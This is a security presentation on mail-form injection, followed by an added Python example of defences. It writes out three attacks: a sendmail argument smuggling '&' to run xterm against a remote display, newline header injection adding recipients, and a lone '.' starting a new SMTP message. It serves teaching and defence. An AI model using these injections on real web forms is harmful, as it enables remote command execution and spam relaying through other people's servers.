
Avoiding Backend Exploitation of Mail Forms

Max Kessler, LPIC-1. Avoiding Backend Exploitation of Mail Forms. OWASP Top 10 List. #1 Unvalidated user input #2 Broken access control (sort of) #6 Injection flaws. How do mail forms work?. A user types in their name, address and a message.



  1. Max Kessler, LPIC-1
  Avoiding Backend Exploitation of Mail Forms

  2. OWASP Top 10 List
  • #1 Unvalidated user input
  • #2 Broken access control (sort of)
  • #6 Injection flaws

  3. How do mail forms work?
  • A user types in their name, address and a message.
  • Their data are sent to the web server in an HTTP request.
  • The server runs a script that formats the text for consumption by a mail server, then feeds it to the mail server.

  4. User input on the command line
  Exploit 1: insert semicolon/ampersand
  The command should be:
    /bin/sh /usr/sbin/sendmail -f max@example.com \
      user1@example.com
  The command is:
    /bin/sh /usr/sbin/sendmail -f max@example.com& \
      xterm -display 192.168.0.201:0&echo \
      user1@example.com

  5. Replay with control characters
  Exploit 2: insert control characters
  E-mail address should be:
    max@example.com
  E-mail address is:
    max@example.com
    To: user2@example.com, user3@example.com

  6. Starting a new message
  Exploit 3: using '.' to start a new message
  SMTP servers allow multiple messages to be sent through a single connection.
  A new message is started by putting a '.' on a line by itself.
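The three exploits in slides 4 to 6 have matching defences in the form-handling script: keep visitor data off the command line and never go through a shell, reject control characters (CR/LF) in anything that becomes a header, validate the address against a strict allow-list, and apply SMTP dot transparency (or sendmail's -i) so a lone '.' cannot end the message. The following is an added example, not code from the presentation; the fixed site sender/recipient policy and the example.com addresses are assumptions.

```python
import re
import subprocess
from email.message import EmailMessage

# Assumed site policy: a fixed, trusted envelope sender and recipient.
# The visitor's address is used only in a Reply-To header, after validation.
SITE_SENDER = "webform@example.com"
SITE_RECIPIENT = "user1@example.com"

# Allow-list pattern (constructed, deliberately strict): whitespace, quotes,
# commas, '&', ';' and other metacharacters can never match.
ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

def valid_address(addr: str) -> bool:
    """Exploit 1/2 defence: accept only a plain mailbox address."""
    return len(addr) <= 254 and ADDR_RE.fullmatch(addr) is not None

def has_control_chars(text: str) -> bool:
    """Exploit 2 defence: CR, LF or any other C0 control in a header value
    would let the visitor append headers such as To: or Bcc:."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in text)

def smtp_data(body: str) -> bytes:
    """Exploit 3 defence for scripts that speak SMTP themselves (RFC 5321
    s.4.5.2 transparency): every body line starting with '.' gets a second
    '.', so only the script's own final '.' can terminate DATA."""
    lines = body.replace("\r\n", "\n").split("\n")
    stuffed = ["." + ln if ln.startswith(".") else ln for ln in lines]
    return ("\r\n".join(stuffed) + "\r\n.\r\n").encode()

def build_message(name: str, reply_to: str, body: str) -> bytes:
    """Validate form fields, then let the email library do the formatting."""
    if not valid_address(reply_to) or has_control_chars(name):
        raise ValueError("rejected form input")
    msg = EmailMessage()
    msg["From"] = SITE_SENDER
    msg["To"] = SITE_RECIPIENT
    msg["Reply-To"] = reply_to
    msg["Subject"] = f"Web form message from {name}"
    msg.set_content(body)
    return msg.as_bytes()

def sendmail_argv() -> list:
    """Fixed argv with no shell and no visitor data, so '&' or ';' in input
    can never become a command; -i makes sendmail ignore a lone '.' on stdin."""
    return ["/usr/sbin/sendmail", "-i", "-f", SITE_SENDER, SITE_RECIPIENT]

def send(name: str, reply_to: str, body: str) -> None:
    subprocess.run(sendmail_argv(), input=build_message(name, reply_to, body),
                   check=True)  # shell=False is the default
```

Running `send()` requires a local sendmail binary; the validation and formatting functions can be exercised offline.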
